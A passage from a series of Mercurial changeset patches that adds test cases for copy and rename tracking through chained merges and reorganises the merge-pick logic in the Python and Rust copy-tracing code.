'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rw' + removed : r, ; + added p1: w, r; + ##### revision "q-2 w -move-> v" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00vw' + added p1: v, w; + removed : w, ; ##### revision "mBAm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613763993 -3600 # Fri Feb 19 20:46:33 2021 +0100 # Node ID a1273bea99cc91f16ef1a2d081ac119a3a8f0137 # Parent eb60dadd1be1ab94e3a7e652ecd9e3835e054155 test-copies: introduce case combining the `p` and `q` branch That case involves conflicting copies information from each branch. It is similar to the `mAEm` / `mEAm` case except this case actual content merge is involved too. Differential Revision: https://phab.mercurial-scm.org/D10057 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -422,6 +422,49 @@ o i-0 initial commit: a b h +Subcase: new copy information on both side with an actual merge happening +````````````````````````````````````````````````````````````````````````` + +- the "p-" branch renaming 't' to 'v' (through 'u') +- the "q-" branch renaming 'r' to 'v' (through 'w') + + $ case_desc="merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content)" + + $ hg up 'desc("p-2")' + 3 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ hg merge 'desc("q-2")' --tool ':union' + merging v + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mPQm-0 $case_desc - one way" + $ hg up 'desc("q-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("p-2")' --tool ':union' + merging v + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mQPm-0 $case_desc - the other way" + created new head + $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' + o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + |\ + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + Subcase: existing copy information overwritten on one branch ```````````````````````````````````````````````````````````` @@ -459,8 +502,9 @@ (branch merge, don't forget to commit) $ hg ci -m "mFBm-0 $case_desc - the other way" created new head + $ hg up null --quiet $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - @ mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ @@ -491,8 +535,7 @@ $ case_desc="actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content" $ hg up 'desc("i-2")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ echo "some update" >> d $ hg commit -m "g-1: update d" created new head @@ -1229,6 +1272,8 @@ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) mN,GFm: chained merges (copy-overwrite -> simple) - same content mO,FGm: chained merges (copy-overwrite -> simple) - same content + mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way n-1: unrelated changes (based on the "f" series of changes) o-1: unrelated changes (based on "g" changes) p-1: t -move-> u @@ -1433,6 +1478,16 @@ entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; + ##### revision "mPQm-0 merge with copies info on both side - P side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v' + merged : v, ; + ##### revision "mQPm-0 merge with copies info on both side - P side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v' + merged : v, ; ##### revision "f-1" ##### 1 sidedata entries entry-0014 size 24 @@ -2364,6 +2419,134 @@ ~ #endif +Subcase: new copy information on both side with an actual merge happening +````````````````````````````````````````````````````````````````````````` + +- the "p-" branch renaming 't' to 'v' (through 'u') +- the "q-" branch renaming 'r' to 'v' (through 'w') + + + $ hg log -G --rev '::(desc("mPQm")+desc("mQPm"))' + o mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + |\ + +---o mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + | |/ + | o q-2 w -move-> v + | | + | o q-1 r -move-> w + | | + o | p-2: u -move-> v + | | + o | p-1: t -move-> u + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + +#if no-changeset + $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v' + 0946c662ef16e4e67397fd717389eb6693d41749 644 v + $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v' + 0db3aad7fcc1ec27fab57060e327b9e864ea0cc9 644 v + $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v' + 3f91841cd75cadc9a1f1b4e7c1aa6d411f76032e 644 v + $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v' + c43c088b811fd27983c0a9aadf44f3343cd4cd7e 644 v + $ hg debugindex v | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * 3f91841cd75c 000000000000 000000000000 + 1 * c43c088b811f 000000000000 000000000000 + 2 * 0946c662ef16 3f91841cd75c c43c088b811f + 3 * 0db3aad7fcc1 c43c088b811f 3f91841cd75c +#else + $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v' + 65fde9f6e4d4da23b3f610e07b53673ea9541d75 644 v + $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v' + a098dda6413aecf154eefc976afc38b295acb7e5 644 v + $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v' + 5aed6a8dbff0301328c08360d24354d3d064cf0d 644 v + $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v' + a38b2fa170219750dac9bc7d19df831f213ba708 644 v + $ hg debugindex v | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * 5aed6a8dbff0 000000000000 000000000000 + 1 * a38b2fa17021 000000000000 000000000000 + 2 * 65fde9f6e4d4 5aed6a8dbff0 a38b2fa17021 + 3 * a098dda6413a a38b2fa17021 5aed6a8dbff0 +#endif + +# Here the filelog based implementation is not looking at the rename +# information (because the file exist on both side). However the changelog +# based on works fine. We have different output. + + $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mPQm-0")' + M v + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mQPm-0")' + M v + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mPQm-0")' + M v + t (no-filelog !) + R t + $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mQPm-0")' + M v + t (no-filelog !) + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("p-2")' + A v + t + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("q-2")' + A v + r + R r + +# From here, we run status against revision where both source file exists. +# +# The filelog based implementation picks an arbitrary side based on revision +# numbers. So the same side "wins" whatever the parents order is. This is +# sub-optimal because depending on revision numbers means the result can be +# different from one repository to the next. +# +# The changeset based algorithm use the parent order to break tie on conflicting +# information and will have a different order depending on who is p1 and p2. +# That order is stable accross repositories. (data from p1 prevails) + + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mPQm-0")' + A v + t + R r + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mQPm-0")' + A v + t (filelog !) + r (no-filelog !) + R r + R t + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm-0")' + A d + a + A v + r (filelog !) + p (no-filelog !) + R a + R p + R r + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm-0")' + A d + a + A v + r + R a + R p + R r + Comparing with merging with a deletion (and keeping the file) ------------------------------------------------------------- # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613991418 -3600 # Mon Feb 22 11:56:58 2021 +0100 # Node ID c7baff95808cecbdcb48b7502bb37f0e6e8452d0 # Parent a1273bea99cc91f16ef1a2d081ac119a3a8f0137 test-copies: add a case involving the `b` and a new `r` branch That case involve a branch overwriting copies information from the other one. It is similar to the `mBFm` / `mFBm` case except this case actual content merge is involved too. Differential Revision: https://phab.mercurial-scm.org/D10058 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -521,6 +521,60 @@ o i-0 initial commit: a b h +Subcase: existing copy information overwritten on one branch, with different content) +````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (t) with a rename (from r to x to t), v content is not the same as on the other branch + + $ case_desc="simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content" + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv r x + $ hg commit -m "r-1: rename r -> x" + created new head + $ hg mv --force x t + $ hg commit -m "r-2: rename t -> x" + $ hg debugindex t | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d74efbf65309 000000000000 000000000000 (no-changeset !) + 1 * 02a930b9d7ad 000000000000 000000000000 (no-changeset !) + 0 * 5aed6a8dbff0 000000000000 000000000000 (changeset !) + 1 * a38b2fa17021 000000000000 000000000000 (changeset !) + $ hg up 'desc("b-1")' + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("r-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mBRm-0 $case_desc - one way" + $ hg up 'desc("r-2")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mRBm-0 $case_desc - the other way" + created new head + $ hg up null --quiet + $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))' + o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way + |\ + +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way + | |/ + | o r-2: rename t -> x + | | + | o r-1: rename r -> x + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + Subcase: reset of the copy history on one side `````````````````````````````````````````````` @@ -1244,6 +1298,7 @@ mBCm-1 re-add d mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way @@ -1274,12 +1329,15 @@ mO,FGm: chained merges (copy-overwrite -> simple) - same content mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way n-1: unrelated changes (based on the "f" series of changes) o-1: unrelated changes (based on "g" changes) p-1: t -move-> u p-2: u -move-> v q-1 r -move-> w q-2 w -move-> v + r-1: rename r -> x + r-2: rename t -> x Test that sidedata computations during upgrades are correct @@ -1508,6 +1566,26 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision "r-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rx' + removed : r, ; + added p1: x, r; + ##### revision "r-2" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00tx' + touched p1: t, x; + removed : x, ; + ##### revision "mBRm-0 simple merge - B side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mRBm-0 simple merge - B side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' ##### revision "g-1" ##### 1 sidedata entries entry-0014 size 14 @@ -2160,6 +2238,104 @@ ~ #endif + +Subcase: existing copy information overwritten on one branch, with different content) +````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (t) with a rename (from r to x to t), v content is not the same as on the other branch + + $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))' + o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way + |\ + +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way + | |/ + | o r-2: rename t -> x + | | + | o r-1: rename r -> x + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBRm-0")' + M b + A d + a + A t + r + R a + R p + R r + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mRBm-0")' + M b + A d + a + A t + r + R a + R p + R r + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBRm-0")' + M t + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mBRm-0")' + M b + $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mBRm-0")' + M b + M t + x (no-filelog !) + R x + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mRBm-0")' + M t + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mRBm-0")' + M b + $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mRBm-0")' + M b + M t + x (no-filelog !) + R x + +#if no-changeset + $ hg log -Gfr 'desc("mBRm-0")' d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mBRm-0")' d + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + +#if no-changeset + $ hg log -Gfr 'desc("mRBm-0")' d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mRBm-0")' d + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + Subcase: reset of the copy history on one side `````````````````````````````````````````````` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613992860 -3600 # Mon Feb 22 12:21:00 2021 +0100 # Node ID 388a92023a1afdb38e6c6ed4f2100287c2af59c9 # Parent c7baff95808cecbdcb48b7502bb37f0e6e8452d0 test-copies: introduce merge chains test for the P/Q merges This is similar to the chaining test we have for the A/E merges. The current result of this tests is wrong, as for the other test of the same familly. This will be fixed by a later changesets. Differential Revision: https://phab.mercurial-scm.org/D10059 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -998,6 +998,105 @@ o i-0 initial commit: a b h +Subcase: chaining conflicting rename resolution, with actual merging happening +`````````````````````````````````````````````````````````````````````````````` + +The "mPQm" and "mQPm" case create a rename tracking conflict on file 't'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 't' and the arbitration done within "mPQm" and "mQP" +about that file should stay unchanged. + + $ case_desc="chained merges (conflict -> simple) - different content" + +(extra unrelated changes) + + $ hg up 'desc("p-2")' + 3 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ echo s > unrelated-s + $ hg add unrelated-s + $ hg ci -m 's-1: unrelated changes (based on the "p" series of changes)' + created new head + + $ hg up 'desc("q-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ echo t > unrelated-t + $ hg add unrelated-t + $ hg ci -m 't-1: unrelated changes (based on "q" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mPQm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ hg merge 'desc("t-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mPQ,Tm: $case_desc" + +(merge variant 2) + + $ hg up 'desc("t-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ hg merge 'desc("mPQm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mT,PQm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mQPm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("s-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mQP,Sm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("s-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mQPm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mS,QPm: $case_desc" + created new head + $ hg up null --quiet + + + $ hg log -G --rev '::(desc("mPQ,Tm") + desc("mT,PQm") + desc("mQP,Sm") + desc("mS,QPm"))' + o mS,QPm: chained merges (conflict -> simple) - different content + |\ + +---o mQP,Sm: chained merges (conflict -> simple) - different content + | |/ + | | o mT,PQm: chained merges (conflict -> simple) - different content + | | |\ + | | +---o mPQ,Tm: chained merges (conflict -> simple) - different content + | | | |/ + | | | o t-1: unrelated changes (based on "q" changes) + | | | | + | o | | s-1: unrelated changes (based on the "p" series of changes) + | | | | + o-----+ mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + |/ / / + | o / mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + |/|/ + | o q-2 w -move-> v + | | + | o q-1 r -move-> w + | | + o | p-2: u -move-> v + | | + o | p-1: t -move-> u + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + Subcase: chaining salvage information during a merge ```````````````````````````````````````````````````` @@ -1009,7 +1108,7 @@ (creating the change) $ hg up 'desc("c-1")' - 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + 5 files updated, 0 files merged, 0 files removed, 0 files unresolved $ echo l > unrelated-l $ hg add unrelated-l $ hg ci -m 'l-1: unrelated changes (based on "c" changes)' @@ -1327,9 +1426,13 @@ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) mN,GFm: chained merges (copy-overwrite -> simple) - same content mO,FGm: chained merges (copy-overwrite -> simple) - same content + mPQ,Tm: chained merges (conflict -> simple) - different content mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + mQP,Sm: chained merges (conflict -> simple) - different content mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way + mS,QPm: chained merges (conflict -> simple) - different content + mT,PQm: chained merges (conflict -> simple) - different content n-1: unrelated changes (based on the "f" series of changes) o-1: unrelated changes (based on "g" changes) p-1: t -move-> u @@ -1338,6 +1441,8 @@ q-2 w -move-> v r-1: rename r -> x r-2: rename t -> x + s-1: unrelated changes (based on the "p" series of changes) + t-1: unrelated changes (based on "q" changes) Test that sidedata computations during upgrades are correct @@ -1681,6 +1786,32 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision "s-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-s' + added : unrelated-s, ; + ##### revision "t-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-t' + added : unrelated-t, ; + ##### revision "mPQ,Tm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mT,PQm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mQP,Sm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mS,QPm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' ##### revision "l-1" ##### 1 sidedata entries entry-0014 size 24 @@ -3079,6 +3210,55 @@ a (known-bad-output sidedata !) a (known-bad-output upgraded !) +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mPQm" and "mQPm" case create a rename tracking conflict on file 'v'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'v' and the arbitration done within "mPQm" and "mQP" +about that file should stay unchanged. + +The result from mPQm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm")' v + A v + r (filelog !) + p (sidedata !) + p (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQ,Tm")' v + A v + r (filelog !) + p (sidedata !) + p (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mT,PQm")' v + A v + r (filelog !) + p (missing-correct-output sidedata !) + p (missing-correct-output upgraded !) + r (known-bad-output sidedata !) + r (known-bad-output upgraded !) + + +The result from mQPm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm")' v + A v + r (no-changeset no-compatibility !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQP,Sm")' v + A v + r (no-changeset no-compatibility !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mS,QPm")' v + A v + r (filelog !) + r (missing-correct-output sidedata !) + r (missing-correct-output upgraded !) + p (known-bad-output sidedata !) + p (known-bad-output upgraded !) + Subcase: chaining salvage information during a merge ```````````````````````````````````````````````````` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607970393 -3600 # Mon Dec 14 19:26:33 2020 +0100 # Node ID c692384bb559b4210e80774bcf8974e543face01 # Parent 388a92023a1afdb38e6c6ed4f2100287c2af59c9 copies: rearrange all value comparison conditional To properly handle the newly tested case (chaining of merges) we will need to detect more accurately when an actualy merging of the copy information (and superseed the two existing data). Before starting to do so, we need to reorganise the values comparison to introduce different conditional branches when such actual merging is needed/detected. To avoid mixing too many change in this complicated code, we do the reorganisation before adding the "overwrite detection" logic in the next changesets. Differential Revision: https://phab.mercurial-scm.org/D9612 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -481,32 +481,60 @@ def _compare_values(changes, isancestor, dest, minor, major): - """compare two value within a _merge_copies_dict loop iteration""" + """compare two value within a _merge_copies_dict loop iteration + + return pick + + - pick is one of PICK_MINOR, PICK_MAJOR or PICK_EITHER + """ major_tt, major_value = major minor_tt, minor_value = minor - # evacuate some simple case first: if major_tt == minor_tt: # if it comes from the same revision it must be the same value assert major_value == minor_value return PICK_EITHER - elif major[1] == minor[1]: - return PICK_EITHER - - # actual merging needed: content from "major" wins, unless it is older than - # the branch point or there is a merge - elif changes is not None and major[1] is None and dest in changes.salvaged: + elif ( + changes is not None + and minor_value is not None + and major_value is None + and dest in changes.salvaged + ): + # In this case, a deletion was reverted, the "alive" value overwrite + # the deleted one. return PICK_MINOR - elif changes is not None and minor[1] is None and dest in changes.salvaged: + elif ( + changes is not None + and major_value is not None + and minor_value is None + and dest in changes.salvaged + ): + # In this case, a deletion was reverted, the "alive" value overwrite + # the deleted one. return PICK_MAJOR - elif changes is not None and dest in changes.merged: + elif isancestor(minor_tt, major_tt): + if changes is not None and dest in changes.merged: + # change to dest happened on the branch without copy-source change, + # so both source are valid and "major" wins. + return PICK_MAJOR + else: + return PICK_MAJOR + elif isancestor(major_tt, minor_tt): + if changes is not None and dest in changes.merged: + # change to dest happened on the branch without copy-source change, + # so both source are valid and "major" wins. + return PICK_MAJOR + else: + return PICK_MINOR + elif minor_value is None: + # in case of conflict, the "alive" side wins. return PICK_MAJOR - elif not isancestor(major_tt, minor_tt): - if major[1] is not None: - return PICK_MAJOR - elif isancestor(minor_tt, major_tt): - return PICK_MAJOR - return PICK_MINOR + elif major_value is None: + # in case of conflict, the "alive" side wins. + return PICK_MINOR + else: + # in case of conflict where both side are alive, major wins. + return PICK_MAJOR def _revinfo_getter_extra(repo): diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -746,6 +746,8 @@ MergePick::Any } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { MergePick::Minor + } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { + MergePick::Major } else { MergePick::Major } @@ -753,45 +755,61 @@ // We cannot get copy information for both p1 and p2 in the // same rev. So this is the same value. unreachable!( - "conflict information from p1 and p2 in the same revision" + "conflicting information from p1 and p2 in the same revision" ); } else { let dest_path = path_map.untokenize(*dest); let action = changes.get_merge_case(dest_path); - if src_major.path.is_none() && action == MergeCase::Salvaged { + if src_minor.path.is_some() + && src_major.path.is_none() + && action == MergeCase::Salvaged + { // If the file is "deleted" in the major side but was // salvaged by the merge, we keep the minor side alive MergePick::Minor - } else if src_minor.path.is_none() && action == MergeCase::Salvaged { + } else if src_major.path.is_some() + && src_minor.path.is_none() + && action == MergeCase::Salvaged + { // If the file is "deleted" in the minor side but was // salvaged by the merge, unconditionnaly preserve the // major side. MergePick::Major - } else if action == MergeCase::Merged { - // If the file was actively merged, copy information - // from each side might conflict. The major side will - // win such conflict. - MergePick::Major + } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { + // The information from the minor version are strictly older than + // the major version + if action == MergeCase::Merged { + // If the file was actively merged, its means some non-copy + // activity happened on the other branch. It + // mean the older copy information are still relevant. + // + // The major side wins such conflict. + MergePick::Major + } else { + // No activity on the minor branch, pick the newer one. + MergePick::Major + } } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { - // If the minor side is strictly newer than the major - // side, it should be kept. - MergePick::Minor - } else if src_major.path.is_some() { - // without any special case, the "major" value win - // other the "minor" one. + if action == MergeCase::Merged { + // If the file was actively merged, its means some non-copy + // activity happened on the other branch. It + // mean the older copy information are still relevant. + // + // The major side wins such conflict. + MergePick::Major + } else { + // No activity on the minor branch, pick the newer one. + MergePick::Minor + } + } else if src_minor.path.is_none() { + // the minor side has no relevant information, pick the alive one MergePick::Major - } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { - // the "major" rev is a direct ancestors of "minor", - // any different value should - // overwrite - MergePick::Major + } else if src_major.path.is_none() { + // the major side has no relevant information, pick the alive one + MergePick::Minor } else { - // major version is None (so the file was deleted on - // that branch) and that branch is independant (neither - // minor nor major is an ancestors of the other one.) - // We preserve the new - // information about the new file. - MergePick::Minor + // by default the major side wins + MergePick::Major } } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607798108 -3600 # Sat Dec 12 19:35:08 2020 +0100 # Node ID c19c662097e160402188091020386a456e5ebaa3 # Parent c692384bb559b4210e80774bcf8974e543face01 copies: detect case when a merge decision overwrite previous data We now detect and record when a merge case required special logic (eg: thing that append during the merge, ambiguity leading to picking p1 data, etc) and we explicitly mark the result as superseding the previous data. This fixes the family of test we previously added. Differential Revision: https://phab.mercurial-scm.org/D9613 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -434,7 +434,11 @@ # potential filelog related behavior. assert parent == 2 current_copies = _merge_copies_dict( - newcopies, current_copies, isancestor, changes + newcopies, + current_copies, + isancestor, + changes, + current_rev, ) all_copies[current_rev] = current_copies @@ -456,7 +460,7 @@ PICK_EITHER = 2 -def _merge_copies_dict(minor, major, isancestor, changes): +def _merge_copies_dict(minor, major, isancestor, changes, current_merge): """merge two copies-mapping together, minor and major In case of conflict, value from "major" will be picked. @@ -474,8 +478,15 @@ if other is None: minor[dest] = value else: - pick = _compare_values(changes, isancestor, dest, other, value) - if pick == PICK_MAJOR: + pick, overwrite = _compare_values( + changes, isancestor, dest, other, value + ) + if overwrite: + if pick == PICK_MAJOR: + minor[dest] = (current_merge, value[1]) + else: + minor[dest] = (current_merge, other[1]) + elif pick == PICK_MAJOR: minor[dest] = value return minor @@ -483,9 +494,10 @@ def _compare_values(changes, isancestor, dest, minor, major): """compare two value within a _merge_copies_dict loop iteration - return pick + return (pick, overwrite). - pick is one of PICK_MINOR, PICK_MAJOR or PICK_EITHER + - overwrite 